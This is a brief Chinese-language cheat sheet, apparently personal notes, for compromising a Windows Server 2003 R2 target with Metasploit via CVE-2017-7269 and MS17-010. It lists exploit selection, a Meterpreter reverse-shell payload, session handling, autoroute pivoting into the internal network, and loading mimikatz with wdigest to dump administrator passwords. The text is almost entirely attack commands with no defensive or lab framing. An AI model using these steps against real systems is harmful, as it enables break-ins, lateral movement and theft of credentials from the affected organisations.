目标主機:2003rs2
漏洞:cve-2017-7269 ms17-010
exp搜尋 : search cve-xxx
利用:use exp名稱
看配置:show options
配置:set 配置名 一個值
設定payload:set payload windows/meterpreter/reverse_tcp(反彈shell)
最終攻擊:exploit
把shell放背景:background
互動:session -l 然後 session -i 1
添加路由攻擊内網:run autoroute -s 目标網段/24
你還應該去了解meterpreter的功能
例如screenshot 截屏
load mimikatz 然後wdigest 擷取管理者密碼